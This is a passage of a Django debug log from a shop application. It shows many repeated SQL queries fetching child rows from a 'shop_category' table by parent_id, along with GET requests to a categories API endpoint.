"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 13:58:22,496 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:58:22,499 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:58:22,504 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:58:22,510 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:58:22,514 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:58:22,518 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:58:22,522 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:58:22,525 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:58:22,528 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:58:22,531 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:58:22,537 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:58:22,541 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:58:22,545 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:58:22,549 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:58:22,551 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:58:22,554 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:58:22,556 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:58:22,559 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:58:22,561 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 13:58:22,564 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 13:58:22,567 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 13:58:22,569 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 13:58:22,572 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 13:58:22,574 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 13:58:22,578 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 13:58:22,580 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 13:58:22,583 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 13:58:22,585 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 13:58:22,588 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 13:58:22,594 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 13:58:22,597 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 13:58:22,599 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 13:58:22,601 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 13:58:22,604 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 13:58:22,607 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 13:58:22,610 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 13:58:22,613 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 13:58:22,615 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 13:58:22,618 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 13:58:22,620 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 13:58:22] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 13:58:31,995 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 13:58:32,000 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 13:58:32,012 utils 4252 140031747061504 (0.010) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:58:32,016 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 13:58:32,020 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 13:58:32,023 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 13:58:32,028 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 13:58:32,030 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) [18/Dec/2019 13:58:32] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 13:58:32,033 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 13:58:32,036 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 13:58:32,038 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 13:58:32,041 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 13:58:32,044 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 13:58:32,046 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 13:58:32,049 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 13:58:32,051 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 13:58:32,054 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 13:58:32,057 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 13:58:32,059 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 13:58:32,061 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 13:58:32,064 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 13:58:32,068 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 13:58:32,071 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 13:58:32,074 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 13:58:32,077 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 13:58:32,080 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 13:58:32,083 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 